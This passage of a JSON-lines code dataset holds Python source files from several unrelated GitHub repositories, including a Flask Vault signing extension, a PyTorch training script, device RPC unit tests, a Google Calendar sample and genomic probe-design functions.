break\n","repo_name":"TOLLER-Android/main","sub_path":"agent-build/gen-oat.py","file_name":"gen-oat.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"36"} +{"seq_id":"42997192151","text":"import os\n\nfrom base64 import (\n b64decode,\n b64encode,\n)\n\nimport hvac\n\nfrom flask import g\n\nfrom cabotage.utils.cert_hacks import construct_cert_from_public_key\n\n\nclass Vault(object):\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n self.vault_url = app.config.get(\"VAULT_URL\", \"http://127.0.0.1:8200\")\n self.vault_verify = app.config.get(\"VAULT_VERIFY\", False)\n self.vault_cert = app.config.get(\"VAULT_CERT\", None)\n self.vault_token = app.config.get(\"VAULT_TOKEN\", None)\n self.vault_token_file = app.config.get(\n \"VAULT_TOKEN_FILE\", os.path.expanduser(\"~/.vault-token\")\n )\n self.vault_token_unwrap = app.config.get(\"VAULT_TOKEN_UNWRAP\", False)\n self.vault_prefix = app.config.get(\"VAULT_PREFIX\", \"secret/cabotage\")\n self.vault_signing_mount = app.config.get(\"VAULT_SIGNING_MOUNT\", \"transit\")\n self.vault_signing_key = app.config.get(\"VAULT_SIGNING_KEY\", \"cabotage-app\")\n\n if self.vault_token is None:\n if os.path.exists(self.vault_token_file):\n with open(self.vault_token_file, \"r\") as vault_token_file:\n self.vault_token = vault_token_file.read().lstrip().rstrip()\n\n # Unwrap!\n # if self.vault_token_unwrap:\n # unwrap_dang_token\n\n app.teardown_appcontext(self.teardown)\n\n def connect_vault(self):\n vault_client = hvac.Client(\n url=self.vault_url,\n token=self.vault_token,\n verify=self.vault_verify,\n cert=self.vault_cert,\n )\n return vault_client\n\n def teardown(self, exception):\n g.pop(\"vault_client\", None)\n\n @property\n def vault_connection(self):\n if \"vault_client\" not in g:\n g.vault_client = self.connect_vault()\n return g.vault_client\n\n @property\n def signing_public_key(self):\n VAULT_TRANSIT_KEY = f\"{self.vault_signing_mount}/keys/{self.vault_signing_key}\"\n key_data = self.vault_connection.read(VAULT_TRANSIT_KEY)\n keys = key_data[\"data\"][\"keys\"]\n latest = str(key_data[\"data\"][\"latest_version\"])\n return keys[latest][\"public_key\"].encode()\n\n @property\n def signing_cert(self):\n return construct_cert_from_public_key(\n self.sign_payload,\n self.signing_public_key,\n \"cabotage-app\",\n )\n\n def sign_payload(self, payload, algorithm=\"sha2-256\", marshaling_algorithm=\"asn1\"):\n if algorithm not in (\"sha2-224\", \"sha2-256\", \"sha2-384\", \"sha2-512\"):\n raise KeyError(f\"Specified algorithm ({algorithm}) not supported!\")\n VAULT_TRANSIT_SIGNING = (\n f\"{self.vault_signing_mount}/sign/{self.vault_signing_key}/{algorithm}\"\n )\n signature_response = self.vault_connection.write(\n VAULT_TRANSIT_SIGNING,\n input=b64encode(payload.encode()).decode(),\n marshaling_algorithm=marshaling_algorithm,\n )\n if marshaling_algorithm == \"jws\":\n return signature_response[\"data\"][\"signature\"].split(\":\")[2]\n signature_encoded = signature_response[\"data\"][\"signature\"].split(\":\")[2]\n return b64decode(signature_encoded)\n","repo_name":"cabotage/cabotage-app","sub_path":"cabotage/server/ext/vault.py","file_name":"vault.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"36"} +{"seq_id":"43606644090","text":"stack=[]\r\ndef stackpush():\r\n item=input(\"Enter your stack item to add : \")\r\n stack.append(item)\r\n print(item,\" has been added to stack\")\r\n\r\ndef stackpop():\r\n item=stack.pop()\r\n print(item,\" has been removed from stack\")\r\n\r\ndef stackview():\r\n print(\"Stack : \", stack)\r\n\r\nchoice_dict={'u':'stackpush','o':'stackpop','v':'stackview'}\r\ndef welcome():\r\n print('''Welcome to stack. Please choose an option(u/o/v/e)\r\n P(u)sh\r\n P(o)p\r\n (V)iew\r\n (E)xit''')\r\n choice=input(\"Enter your option(u/o/v/e) : \")\r\n while True :\r\n if choice not in 'uove' :\r\n print(\"Invalid choice\")\r\n else:\r\n if choice == 'u':\r\n stackpush()\r\n welcome()\r\n elif choice == 'o' :\r\n stackpop()\r\n welcome()\r\n elif choice == 'v' :\r\n stackview()\r\n welcome()\r\n else :\r\n print('Exiting ......')\r\n exit()\r\n\r\n\r\n\r\nwelcome()","repo_name":"Kulamanipradhan0/Python","sub_path":"DataType/List/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"27049414239","text":"import os\nimport json\nimport time\n\nfrom flask import Flask\nfrom pathlib import Path\nimport joblib\n\nfrom google.cloud import storage\n\nGOOGLE_CLOUD_PROJECT = os.environ.get(\"GOOGLE_CLOUD_PROJECT\", \"local\")\nBUCKET_NAME = os.environ.get(\"GOOGLE_CLOUD_PROJECT\", \"kz-rec-sys-dev\")\nTMP_MODEL_DIR = Path(os.environ.get(\"TMP_MODEL_DIR\", \"/tmp\"))\n\nif GOOGLE_CLOUD_PROJECT == \"local\":\n service_account_json = str(Path.home() / '.gcp/kz-rec-sys-dev.json')\n storage_client = storage.Client.from_service_account_json(service_account_json)\nelse:\n storage_client = storage.Client()\n\nbucket = storage_client.get_bucket(BUCKET_NAME)\n\napp = Flask(__name__)\n\nmodels = {}\n\norganization_ids = [16655]\nfilenames = [\"model\", \"uuid_cat_id_map\", \"show_cat_id_map\", \"user_items\"]\n\nfor organization_id in organization_ids:\n models[organization_id] = {}\n organization_tmp_dir = TMP_MODEL_DIR / str(organization_id)\n if not organization_tmp_dir.is_dir():\n organization_tmp_dir.mkdir(parents=True)\n\n # ダウンロード\n for filename in filenames:\n gcs_path = f\"{organization_id}/{filename}.pickle\"\n local_path = organization_tmp_dir / f\"{filename}.pickle\"\n if not local_path.exists():\n bucket.blob(gcs_path).download_to_filename(local_path)\n\n # joblib load\n for filename in filenames:\n local_path = organization_tmp_dir / f\"{filename}.pickle\"\n print(local_path)\n for _ in range(100):\n try:\n models[organization_id][filename] = joblib.load(open(local_path), \"rb\")\n except:\n print(\"error\")\n time.sleep(1)\n else:\n print(\"done\")\n break\n\n@app.route('/')\ndef hello_world():\n target = os.environ.get('TARGET', 'World')\n return 'Hello {}!\\n'.format(target)\n\n@app.route('/rec/')\ndef rec():\n organization_id = 16655\n uuid = '0000019a-f4cd-9a19-6445-58fc330c76db'\n model = models[organization_id]['model']\n user_items = models[organization_id]['user_items']\n uuid_cat_id_map = models[organization_id]['uuid_cat_id_map']\n show_cat_id_map = models[organization_id]['show_cat_id_map']\n recommendations = model.recommend(uuid_cat_id_map[uuid], user_items, N=30, filter_already_liked_items=True)\n rec_fmts = []\n\n for show_cat_code, score in recommendations:\n show_id = show_cat_id_map[show_cat_code]\n\n rec_fmts.append(\n {\"item_id\": show_id, \"score\": float(score)}\n )\n\n return json.dumps(rec_fmts)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8080, debug=True)","repo_name":"ikedaosushi/sandbox","sub_path":"gcp/gae/gae_rec/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"4139797825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 13 16:37:46 2019\n\n@author: anup\n\"\"\"\n# =============================================================================\n# Importing Libraries\n# =============================================================================\nimport os\nimport numpy as np\nimport datetime\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.utils.data as data\nimport torchvision\nfrom torchvision import transforms\nimport network_01 as nw\nfrom utils_01 import *\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(\"Device :\", device)\n# =============================================================================\n# Defining Parameters\n# =============================================================================\nVERSION = 8\nEPOCHS = 100\nBATCH_SIZE = 8\nLEARNING_RATE = 0.001\nTRAIN_DATA_PATH = \"/home/anup/work/multilabel/label_tool/dataset_single/new_data/\"\nTEST_DATA_PATH = \"/home/anup/work/multilabel/label_tool/dataset_single/new_data/\"\n\ntransformed_dataset = MultiLabelDataset(img_file = '/home/anup/work/multilabel/label_tool/train_dataset.pkl',\n root_dir = TRAIN_DATA_PATH,\n transform = transforms.Compose([ReSize((256, 256)),\n ImCrop(224),\n TensorConv()]))\n\ntrain_data_loader = data.DataLoader(transformed_dataset, \n batch_size=BATCH_SIZE, \n shuffle=True, \n num_workers=1)\n\ntransformed_test_dataset = MultiLabelDataset(img_file = '/home/anup/work/multilabel/label_tool/test_dataset.pkl',\n root_dir = TEST_DATA_PATH,\n transform = transforms.Compose([ReSize((256, 256)),\n ImCrop(224),\n TensorConv()]))\ntest_data_loader = data.DataLoader(transformed_test_dataset,\n batch_size=BATCH_SIZE, \n shuffle=True, \n num_workers=1)\n\n\nprint(\"=\"*50)\n\nif __name__ == '__main__':\n\n print(\"Number of train samples: \", len(transformed_dataset))\n print(\"Number of test samples: \", len(transformed_test_dataset))\n print(\"Detected Classes are: \", transformed_dataset.class_to_idx) # classes are detected by folder structure\n class_dict = transformed_dataset.class_to_idx\n class_dict_reverse = {v: k for k, v in class_dict.items()}\n class_dict.update(class_dict_reverse)\n save_dict(class_dict, 'class_label_dict')\n\n model = nw.multi_label_vgg_model(training=True).to(device)\n optimizer = torch.optim.Adam([{'params': model.features.parameters()}, {'params': model.classifier.parameters(), 'lr': 1e-6}], lr=1e-7)\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer=optimizer, mode='min', patience=5, verbose=True)\n loss_func = nn.BCEWithLogitsLoss()\n\n # Training and Testing\n train_loss_list = []\n test_loss_list = []\n start_time = datetime.datetime.now()\n for epoch in range(EPOCHS):\n model = model.train()\n print(\"Epoch No: \", epoch + 1)\n running_loss = 0.0\n for step_train, train_sample_batched in enumerate(train_data_loader):\n images_batch, labels_batch = train_sample_batched['image'], train_sample_batched['comp_vector']\n images_batch = images_batch.to(device)\n labels_batch = labels_batch.to(device)\n optimizer.zero_grad()\n output = model(images_batch)\n loss = loss_func(output, labels_batch) \n loss.backward() \n optimizer.step()\n running_loss += loss.item()\n if step_train > 0:\n train_loss_list.append(running_loss / step_train)\n print('[%d] Epoch loss: %.6f' %\n (epoch + 1, running_loss / step_train))\n \n test_running_loss = 0.0\n accuracy_prd_list = []\n accuracy_inp_list = []\n for step_test, test_sample_batched in enumerate(test_data_loader):\n model=model.eval()\n test_inputs, test_labels = test_sample_batched['image'], test_sample_batched['comp_vector']\n test_inputs = test_inputs.cuda()\n test_labels = test_labels.cuda()\n test_output = model(test_inputs)\n test_loss = loss_func(test_output, test_labels)\n test_running_loss += test_loss.item()\n test_output[test_output > 0] = 1\n test_output[test_output < 0] = 0\n accuracy_prd_list.extend(test_output.cpu().tolist())\n accuracy_inp_list.extend(test_labels.cpu().tolist())\n test_loss = 0.0\n test_loss_list.append(test_running_loss/step_test)\n scheduler.step(test_running_loss)\n print('[%d] Valid loss: %.6f' %\n (epoch + 1, test_running_loss/step_test))\n accuracy_prd_list = [item for sublist in accuracy_prd_list for item in sublist]\n accuracy_inp_list = [item for sublist in accuracy_inp_list for item in sublist]\n test_accuracy = []\n for i in range(len(accuracy_prd_list)):\n if accuracy_prd_list[i] == accuracy_inp_list[i]:\n test_accuracy.append(1)\n else:\n test_accuracy.append(0)\n print('[%d] Valid accuracy: %.2f' %\n (epoch + 1, round(100 * sum(test_accuracy)/len(accuracy_inp_list), 2)))\n print(\"=\"*50)\n print(\" \"*50)\nfinish_time = datetime.datetime.now()\ntime_diff = finish_time - start_time\nprint (\"Training time: \", divmod(time_diff.total_seconds(), 60))\ntorch.save(model.state_dict(), 'model/model_single_v' + str(VERSION) + '.pt')\n# Create count of the number of epochs\nepoch_count = range(1, len(train_loss_list) + 1)\n\n# Visualize loss history\nplt.plot(epoch_count, train_loss_list, 'r--')\nplt.plot(epoch_count, test_loss_list, 'b-')\nplt.legend(['Training Loss', 'Test Loss'])\nplt.xlabel('Epoch')\nplt.ylabel('Loss')\nplt.savefig('/home/anup/work/multilabel/losses/' + str(VERSION) + '.jpg')\nplt.show()\n\n\n\n \n","repo_name":"anupkhalam/Damage-Detection-Demo","sub_path":"train_01.py","file_name":"train_01.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"37400709017","text":"from regression_tests import *\n\nclass TestBase(Test):\n def test_produce_expected_output(self):\n self.assert_c_produces_output_when_run(\n input='1 2 3',\n expected_return_code=4,\n expected_output='XYZ\\n'\n )\n self.assert_c_produces_output_when_run(\n input='0 10 0',\n expected_return_code=3,\n expected_output='XY\\n'\n )\n\nclass Test_2018(TestBase):\n settings_2018 = TestSettings(\n input=files_in_dir('2018-09-17', excluding=r'.*\\.exe'),\n )\n\nclass Test_2018_x64Pe(Test):\n settings_2018 = TestSettings(\n input=files_in_dir('2018-09-17', matching=r'.*\\.exe'),\n )\n\n def test_check_function_func(self):\n assert self.out_c.has_func('func')\n func = self.out_c.funcs['func']\n assert func.return_type.is_int(32)\n assert func.param_count == 0\n assert func.has_any_if_stmts()\n assert func.has_any_return_stmts()\n assert func.calls('scanf')\n assert func.calls('printf') or func.calls('puts')\n if func.calls('printf'):\n assert self.out_c.has_string_literal('XYZ\\\\n')\n assert self.out_c.has_string_literal('XY\\\\n')\n assert self.out_c.has_string_literal('X\\\\n')\n\n elif func.calls('puts'):\n assert self.out_c.has_string_literal('XYZ')\n assert self.out_c.has_string_literal('XY')\n assert self.out_c.has_string_literal('X')\n\n def test_check_funcion_main(self):\n assert self.out_c.has_func('main')\n assert self.out_c.funcs['main'].calls('func')\n assert self.out_c.funcs['main'].has_any_return_stmts()\n assert len(self.out_c.funcs['main'].return_stmts) == 1\n\n def test_check_presence_of_literals(self):\n assert self.out_c.has_string_literal('%d %d %d')\n\nclass Test_2017(TestBase):\n settings_2017 = TestSettings(\n input=files_in_dir('2017-11-14'),\n )\n\nclass Test_2015(TestBase):\n settings_2015 = TestSettings(\n input=files_in_dir('2015-03-30'),\n )\n","repo_name":"avast/retdec-regression-tests","sub_path":"integration/nested-if-returns/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"} +{"seq_id":"32191744759","text":"from unittest import TestCase\ntry:\n from source import O2x5xxRPCDevice\n from tests.utils import *\n from .config import *\nexcept ModuleNotFoundError:\n import os\n import sys\n sys.path.insert(0, '../source')\n from utils import *\n from config import *\nimport numpy as np\nimport warnings\nimport time\n\n\nclass TestRPC_MainAPI(TestCase):\n rpc = None\n session = None\n config_backup = None\n active_application_backup = None\n pin_layout = None\n\n @classmethod\n def setUpClass(cls):\n cls.rpc = O2x5xxRPCDevice(deviceAddress)\n cls.session = cls.rpc.requestSession()\n cls.config_backup = cls.session.exportConfig()\n cls.active_application_backup = cls.rpc.getParameter(\"ActiveApplication\")\n configFile = getImportSetupByPinLayout(rpc=cls.rpc)['config_file']\n configFile = cls.session.readConfigFile(configFile=configFile)\n cls.session.importConfig(configFile, global_settings=True, network_settings=False, applications=True)\n cls.rpc.switchApplication(1)\n\n @classmethod\n def tearDownClass(cls):\n cls.session.importConfig(cls.config_backup, global_settings=True, network_settings=False, applications=True)\n if cls.active_application_backup != \"0\":\n cls.rpc.switchApplication(cls.active_application_backup)\n cls.session.cancelSession()\n\n def setUp(self):\n warnings.filterwarnings(\"ignore\", category=ResourceWarning, message=\"unclosed.*\")\n warnings.filterwarnings(\"ignore\", category=ResourceWarning, message=\"unclosed \")\n warnings.filterwarnings(\"ignore\", category=ResourceWarning, message=\"unclosed running multiprocessing pool.*>\")\n self.rpc.switchApplication(1)\n\n def test_getParameter(self):\n result = self.rpc.getParameter(value=\"DeviceType\")\n self.assertIsInstance(result, str)\n self.assertEqual(len(result), 5)\n\n def test_getAllParameters(self):\n result = self.rpc.getAllParameters()\n self.assertIsInstance(result, dict)\n\n def test_getSWVersion(self):\n result = self.rpc.getSWVersion()\n self.assertIsInstance(result, dict)\n\n def test_getHWInfo(self):\n result = self.rpc.getHWInfo()\n self.assertIsInstance(result, dict)\n\n def test_getDmesgData(self):\n result = self.rpc.getDmesgData()\n self.assertIsInstance(result, str)\n\n def test_getClientCompatibilityList(self):\n result = self.rpc.getClientCompatibilityList()\n self.assertIsInstance(result, list)\n\n def test_getApplicationList(self):\n result = self.rpc.getApplicationList()\n self.assertIsInstance(result, list)\n self.assertIsInstance(result[0], dict)\n self.assertIsInstance(result[1], dict)\n self.assertIsInstance(result[2], dict)\n self.assertIsInstance(result[3], dict)\n self.assertIsInstance(result[4], dict)\n self.assertIsInstance(result[5], dict)\n\n def test_switchApplication(self):\n initial_application = int(self.rpc.getParameter(\"ActiveApplication\"))\n if initial_application > 1:\n self.rpc.switchApplication(applicationIndex=1)\n while self.rpc.getParameter(\"OperatingMode\") != \"0\":\n time.sleep(1)\n self.assertEqual(int(self.rpc.getParameter(\"ActiveApplication\")), 1)\n else:\n self.rpc.switchApplication(applicationIndex=2)\n while self.rpc.getParameter(\"OperatingMode\") != \"0\":\n time.sleep(1)\n self.assertEqual(int(self.rpc.getParameter(\"ActiveApplication\")), 2)\n time.sleep(5)\n # Switch back to initial application\n self.rpc.switchApplication(applicationIndex=initial_application)\n while self.rpc.getParameter(\"OperatingMode\") != \"0\":\n time.sleep(1)\n self.assertEqual(int(self.rpc.getParameter(\"ActiveApplication\")), initial_application)\n\n def test_getTraceLogs(self):\n numberLogs = 10\n traces = self.rpc.getTraceLogs(nLogs=numberLogs)\n self.assertIsInstance(traces, list)\n self.assertEqual(len(traces), numberLogs)\n\n def test_getApplicationStatisticData(self):\n application_active = self.rpc.getParameter(value=\"ActiveApplication\")\n result = self.rpc.getApplicationStatisticData(applicationIndex=int(application_active))\n self.assertIsInstance(result, dict)\n\n def test_getReferenceImage(self):\n result = self.rpc.getReferenceImage()\n self.assertIsInstance(result, np.ndarray)\n\n def test_isConfigurationDone(self):\n result = self.rpc.isConfigurationDone()\n self.assertTrue(result)\n\n def test_waitForConfigurationDone(self):\n self.rpc.waitForConfigurationDone()\n\n def test_measure(self):\n input_measure_line = {\n \"geometry\": \"line\",\n \"pixel_positions\": [\n {\n \"column\": 980,\n \"row\": 374\n },\n {\n \"column\": 603,\n \"row\": 455\n }\n ]\n }\n\n input_measure_rect = {\n \"geometry\": \"rect\",\n \"pixel_positions\": [\n {\n \"column\": 376,\n \"row\": 426\n },\n {\n \"column\": 710,\n \"row\": 651\n }\n ]\n }\n\n input_measure_circle = {\n \"geometry\": \"circle\",\n \"pixel_positions\": [\n {\n \"column\": 647,\n \"row\": 452\n },\n {\n \"column\": 775,\n \"row\": 533\n }\n ]\n }\n\n result = self.rpc.measure(measureInput=input_measure_line)\n self.assertIsInstance(result, dict)\n self.assertTrue(result)\n result = self.rpc.measure(measureInput=input_measure_rect)\n self.assertIsInstance(result, dict)\n self.assertTrue(result)\n result = self.rpc.measure(measureInput=input_measure_circle)\n self.assertIsInstance(result, dict)\n self.assertTrue(result)\n\n def test_trigger(self):\n number_trigger = 100\n application_active = self.rpc.getParameter(value=\"ActiveApplication\")\n initial_application_stats = self.rpc.getApplicationStatisticData(applicationIndex=int(application_active))\n initial_number_of_frames = initial_application_stats['number_of_frames']\n for i in range(number_trigger):\n answer = self.rpc.trigger()\n self.assertTrue(answer)\n application_stats = self.rpc.getApplicationStatisticData(applicationIndex=int(application_active))\n number_of_frames = application_stats['number_of_frames']\n self.assertEqual(number_of_frames, initial_number_of_frames + number_trigger)\n\n def test_doPing(self):\n result = self.rpc.doPing()\n self.assertEqual(result, \"up\")\n","repo_name":"ifm/o2x5xx-python","sub_path":"tests/test_rpc.py","file_name":"test_rpc.py","file_ext":"py","file_size_in_byte":7000,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"} +{"seq_id":"4848876608","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Copyright 2014 Google Inc. All Rights Reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n\"\"\"Simple command-line sample for the Calendar API.\r\nCommand-line application that retrieves the list of the user's calendars.\"\"\"\r\n\r\nimport sys\r\n\r\nfrom oauth2client import client\r\nfrom googleapiclient import sample_tools\r\n\r\nimport datetime\r\n\r\n_calendar_id = 'mamie.lora06@gmail.com'\r\n_found_calendar = None\r\n\r\n\r\ndef main(argv):\r\n # Authenticate and construct service.\r\n service, flags = sample_tools.init(\r\n argv, 'calendar', 'v3', __doc__, __file__,\r\n scope='https://www.googleapis.com/auth/calendar.readonly')\r\n\r\n try:\r\n page_token = None\r\n \r\n \r\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\r\n print('Getting the upcoming 10 events')\r\n eventsResult = service.events().list(\r\n calendarId='primary', timeMin=now, maxResults=10, singleEvents=True,\r\n orderBy='startTime').execute()\r\n \r\n events = eventsResult.get('items', [])\r\n\r\n if not events:\r\n print('No upcoming events found.')\r\n for event in events:\r\n start = event['start'].get('dateTime', event['start'].get('date'))\r\n print(start, event['summary'])\r\n\r\n \r\n while True:\r\n calendar_list = service.calendarList().list(\r\n pageToken=page_token).execute()\r\n for calendar_list_entry in calendar_list['items']:\r\n \r\n print(calendar_list_entry['summary'])\r\n \r\n calendarId = calendar_list_entry['id']\r\n if calendarId == _calendar_id:\r\n _found_calendar = calendar_list_entry\r\n break\r\n \r\n \r\n page_token = calendar_list.get('nextPageToken')\r\n if not page_token:\r\n break\r\n \r\n _found_calendar\r\n \r\n except client.AccessTokenRefreshError:\r\n print('The credentials have been revoked or expired, please re-run'\r\n 'the application to re-authorize.')\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv)","repo_name":"MamieLora/TOCS2017","sub_path":"KeeeXClient/src/GoogleCalendarClient/ListEvents.py","file_name":"ListEvents.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"25852159732","text":"\"\"\"Functions for generating lists of candidate probes from sequences.\n\nThese functions compute lists of many (likely redundant) probes, termed\ncandidate probes, from a sequence of list of sequences.\n\"\"\"\n\nimport logging\nimport re\nimport sys\n\nimport numpy as np\n\nfrom catch import probe\nfrom catch.utils import seq_io\n\n__author__ = 'Hayden Metsky '\n\nlogger = logging.getLogger(__name__)\n\n\ndef make_candidate_probes_from_sequence(seq,\n probe_length,\n probe_stride,\n min_n_string_length=2,\n allow_small_seqs=None):\n \"\"\"Generate a list of candidate probes from a sequence.\n\n It is possible (especially when there are strings of N's) that\n duplicate probes are returned.\n\n Args:\n seq: sequence as a string or np.array from which to generate\n candidate probes\n probe_length: generate candidate probes with this number of bp\n probe_stride: generate probes from seq separated by this number\n of bp\n min_n_string_length: possible probes that would contain strings\n of this number or more N's are discarded and, instead, new\n probes flanking the string are added\n allow_small_seqs: if set, allow sequences that are smaller than the\n probe length by creating candidate probes equal to the sequence;\n the value gives the minimum allowed probe (sequence) length\n\n Returns:\n list of candidate probes as instances of probe.Probe\n \"\"\"\n n_string_query = re.compile('(N{' + str(min_n_string_length) + ',})')\n\n if len(seq) < probe_length:\n if allow_small_seqs:\n if len(seq) < allow_small_seqs:\n raise ValueError((\"Allowing sequences smaller than the probe \"\n \"length (\" + str(probe_length) + \"), but \"\n \"input sequence is smaller than minimum \"\n \"allowed length\"))\n else:\n if n_string_query.search(seq):\n raise Exception((\"Only possible probe from input \"\n \"sequence has too long a stretch of N's\"))\n else:\n # Make a probe equal to this sequence\n return [probe.Probe.from_str(seq)]\n else:\n raise ValueError((\"An input sequence is smaller than the probe \"\n \"length (\" + str(probe_length) + \"); try \"\n \"setting --small-seq-skip\"))\n\n if isinstance(seq, np.ndarray):\n seq = ''.join(seq)\n\n # Make a probe based on the subsequence seq[start:end].\n # Namely, if that subsequence contains no string of N's, then it\n # is a probe to be added and the probe is returned in a single-\n # valued list. Otherwise, an empty list is returned.\n def add_probe_from_subsequence(start, end,\n is_flanking_n_string=False):\n subseq = seq[start:end]\n probes = []\n\n # Search for strings of min_n_string_length or more N's in subseq\n # and only add a probe if there is not such a string\n if not n_string_query.search(subseq):\n # There's no string of N's, so this subsequence is a valid\n # probe\n probes += [subseq]\n\n # Convert the probes from a Python list of Python strings to a\n # list of probe.Probe\n probes = [probe.Probe.from_str(p) for p in probes]\n for p in probes:\n p.is_flanking_n_string = is_flanking_n_string\n\n return probes\n\n # Populate a list of probes\n probes = []\n for start in np.arange(0, len(seq), probe_stride):\n if start + probe_length > len(seq):\n break\n probes += add_probe_from_subsequence(start, start + probe_length)\n\n if len(seq) % probe_stride != 0:\n # There are bases on the right that were never covered, so add\n # another probe for this\n probes += add_probe_from_subsequence(len(seq) - probe_length,\n len(seq))\n\n # Add probes flanking each string of N's. Specifically, add a probe\n # to the left of a string and to the right. The called function\n # must check that the flanking probe does not contain a string of\n # N's before adding. (Don't recursively chase flanking probes.)\n for match in n_string_query.finditer(seq):\n if match.start() - probe_length >= 0:\n # Add the left flanking probe for match\n probes += add_probe_from_subsequence(match.start() - probe_length,\n match.start(),\n is_flanking_n_string=True)\n if match.end() + probe_length <= len(seq):\n # Add the right flanking probe for match\n probes += add_probe_from_subsequence(match.end(),\n match.end() + probe_length,\n is_flanking_n_string=True)\n\n return probes\n\n\ndef make_candidate_probes_from_sequences(\n seqs,\n probe_length,\n probe_stride,\n min_n_string_length=2,\n allow_small_seqs=None,\n seq_length_to_skip=None):\n \"\"\"Generate a list of candidate probes from a list of sequences.\n\n It is possible (perhaps even likely depending on where\n the sequences come from) that duplicate probes are returned.\n\n Args:\n seqs: list of sequences, each as a string or np.array from which\n to generate candidate probes\n probe_length: generate candidate probes with this number of bp\n probe_stride: generate probes from each sequence separated by this\n number of bp\n min_n_string_length: possible probes that would contain strings\n of this number or more N's are discarded and, instead, new\n probes flanking the string are added\n allow_small_seqs: if set, allow sequences that are smaller than the\n probe length by creating candidate probes equal to the sequence;\n the value gives the minimum allowed probe (sequence) length\n seq_length_to_skip: if set, skip sequences whose length is <=\n the given value (i.e., do not design candidate probes for\n them)\n\n Returns:\n list of candidate probes as instances of probe.Probe\n \"\"\"\n if not isinstance(seqs, list):\n raise TypeError(\"seqs must be a list of sequences\")\n if len(seqs) == 0:\n raise ValueError(\"seqs must have at least one sequence\")\n for seq in seqs:\n if not isinstance(seq, str):\n raise TypeError(\"seqs must be a list of Python strings\")\n\n probes = []\n for seq in seqs:\n if seq_length_to_skip is not None:\n if len(seq) <= seq_length_to_skip:\n logger.info((\"Not designing candidate probes for a \"\n \"sequence with length %d, since it is <= %d\"),\n len(seq), seq_length_to_skip)\n continue\n\n probes += make_candidate_probes_from_sequence(\n seq,\n probe_length=probe_length,\n probe_stride=probe_stride,\n min_n_string_length=min_n_string_length,\n allow_small_seqs=allow_small_seqs)\n\n return probes\n","repo_name":"broadinstitute/catch","sub_path":"catch/filter/candidate_probes.py","file_name":"candidate_probes.py","file_ext":"py","file_size_in_byte":7463,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"36"} +{"seq_id":"36386987899","text":"#!/usr/bin/env python3\nfrom ietf.sql.bcp import Bcp\nfrom ietf.sql.fyi import Fyi\nfrom ietf.sql.rfc import Rfc\nfrom ietf.sql.rfc_not_issued import RfcNotIssued\nfrom ietf.sql.std import Std\nfrom ietf.xml.enum import DocumentType\n\n\ndef query_rfc(session, number):\n row = session.query(Rfc).\\\n filter(Rfc.id == number).\\\n one_or_none()\n return row\n\n\ndef query_rfc_updates(session, number):\n \"\"\"Return the most up-to-date document for RFC `number`.\"\"\"\n orig = query_rfc(session, number)\n # If there are no updates then return the original\n if (orig is None) or (not orig.updated_by):\n return orig\n # Else return the latest document\n else:\n update_doc = orig.updated_by[-1]\n update_type = update_doc.doc_type\n update_id = update_doc.doc_id\n if update_type is DocumentType.RFC:\n return query_rfc(session, update_id)\n elif update_type is DocumentType.STD:\n return query_std(session, update_id)\n elif update_type is DocumentType.BCP:\n return query_bcp(session, update_id)\n elif update_type is DocumentType.FYI:\n return query_fyi(session, update_id)\n else:\n return orig\n\n\ndef query_rfc_obsoletes(session, number):\n \"\"\"Return the latest RFC that obsoletes `number` if such an RFC exists,\n otherwise return RFC `number`.\"\"\"\n # Lookup RFC `number`\n cur_rfc = query_rfc(session, number)\n # If there is no updated_by then return the original\n if (cur_rfc is None) or (not cur_rfc.obsoleted_by):\n return cur_rfc\n # Else recurse\n else:\n obsoleting_id = cur_rfc.obsoleted_by[-1].doc_id\n return query_rfc_obsoletes(session, obsoleting_id)\n\n\ndef query_rfc_see_also(session, number):\n return None\n\n\ndef query_rfc_not_issued(session, number):\n \"\"\"Return an RfcNotIssued object or None.\"\"\"\n row = session.query(RfcNotIssued).\\\n filter(RfcNotIssued.id == number).\\\n one_or_none()\n return row\n\n\ndef query_std(session, number):\n row = session.query(Std).\\\n filter(Std.id == number).\\\n one_or_none()\n return row\n\n\ndef query_bcp(session, number):\n row = session.query(Bcp).\\\n filter(Bcp.id == number).\\\n one_or_none()\n return 